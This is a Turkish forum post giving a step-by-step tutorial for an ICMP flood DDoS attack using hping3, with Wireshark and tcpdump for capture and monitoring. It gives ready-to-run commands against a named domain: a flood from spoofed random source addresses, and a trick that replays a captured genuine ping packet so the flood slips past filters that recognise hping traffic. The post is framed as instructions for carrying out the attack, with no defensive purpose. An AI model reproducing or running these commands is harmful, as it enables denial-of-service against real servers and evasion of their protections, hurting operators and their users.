ICMP Flood DDoS Saldırısı

Rıdvankaya

Uzman Üye
Katılım
21 Eyl 2023
Mesajlar
95
Tepkime puanı
42
Puanları
18
Yaş
31
Konum
Midyat/Mardin
Web sitesi
github.com
ICMP Flood DDoS Saldırısı
ICMP Flood DDoS Saldırısı, bir hedef sunucuya aşırı miktarda ICMP istek paketleri göndererek onu ağ trafiğine boğmak ve servis dışı bırakmak için kullanılan bir saldırı türüdür. Bu saldırıyı gerçekleştirmek için kullanabileceğiniz araçlar şunlardır:
- Hping: Bir ağ test aracıdır. TCP, UDP, ICMP ve RAW-IP protokolleri üzerinden paketler oluşturabilir ve gönderebilir. Ayrıca paketlerin kaynak IP adreslerini rastgele olarak değiştirebilir.
- Wireshark: Bir ağ analiz aracıdır. Ağ üzerinde geçen paketleri yakalayabilir ve inceleyebilir. Ayrıca paketleri binary olarak kaydedebilir ve okuyabilir.
- Tcpdump: Bir komut satırı ağ analiz aracıdır. Wireshark gibi ağ üzerinde geçen paketleri yakalayabilir ve inceleyebilir. Ayrıca paketleri filtreleyebilir ve kaydedebilir.
Saldırıyı gerçekleştirmek için aşağıdaki adımları izleyebilirsiniz:
1. Adım: Hping ile gerçek IP adresinizden networkpentest.net web sunucusuna 1 saniyede 10 ICMP isteği gönderin. Aşağıdaki komutu kullanabilirsiniz:
root@bt:~/Desktop# hping3 --icmp networkpentest.net -i u10000
Bu komutla sunucudan ICMP cevapları alacaksınız. Aynı istekleri rastgele kaynak IP adreslerinden yaptığınızda, ICMP cevapları o IP adreslerine gideceği için görüntülenemeyecektir.
2. Adım: Hping ile rastgele IP adreslerinden networkpentest.net sunucusuna ICMP flood saldırısı gerçekleştirin. Aşağıdaki komutu kullanabilirsiniz:
root@bt:~/Desktop# hping3 --icmp networkpentest.net --flood --rand-source
Bu komutla sunucuya sürekli olarak ICMP istekleri göndereceksiniz. Kaynak IP adresleri rastgele olacağı için sunucu hangi adrese cevap vereceğini bilemeyecek ve aşırı yüklenecektir.
3. Adım: Bazı sistemler hping tarafından üretilen ICMP paketlerini tanır ve otomatik olarak engeller. Bunu atlatmak için normal bir ping komutu ile normal bir ICMP isteği gerçekleştirin ve wireshark ile bu isteği binary olarak kaydedin. Aşağıdaki komutları kullanabilirsiniz:
root@bt:~/Desktop# ping networkpentest.net
Bu komutla sunucuya normal bir ICMP isteği gönderin.
root@bt:~/Desktop# wireshark
Bu komutla wireshark aracını açın ve ICMP filtresi uygulayın. Gönderdiğiniz ICMP isteğini yakalayın ve binary olarak kaydedin. Örneğin test_icmp adında bir dosya oluşturun.
Şimdi ise bu kaydettiğiniz ICMP isteği paketini veri olarak hping aracına verin ve aynı formatta üretilmiş ICMP paketleri ile networkpentest.net web sunucusuna rastgele kaynak IP adreslerinden ICMP flood saldırısı yapın. Aşağıdaki komutu kullanabilirsiniz:
root@bt:~/Desktop# hping3 --rand-source -E test_icmp -d 56 -n -q --flood networkpentest.net --rawip --ipproto 1
Bu komutla sunucuya normal bir ICMP isteği gibi görünen ama aslında sahte olan ICMP paketleri göndereceksiniz. Paketler rastgele kaynaklardan yapıldığı için alınan paket sayısı 0 görünecektir.
Saldırıyı tcpdump ile izleyin ve veri yüklerinin hep aynı olduğunu ve rastgele kaynaklardan gönderildiğini görün. Aşağıdaki komutu kullanabilirsiniz:
root@bt:~/Desktop# tcpdump -nn -tt -X -s0 -i eth0 icmp
Bu komutla ICMP paketlerini yakalayın ve içeriklerini inceleyin.
Bu şekilde ICMP Flood DDoS Saldırısı gerçekleştirmiş olacaksınız. Bu saldırının etkili olması için çok sayıda saldırganın aynı anda saldırması gerekir. Aksi takdirde sunucu saldırıyı savuşturabilir.
 
Üst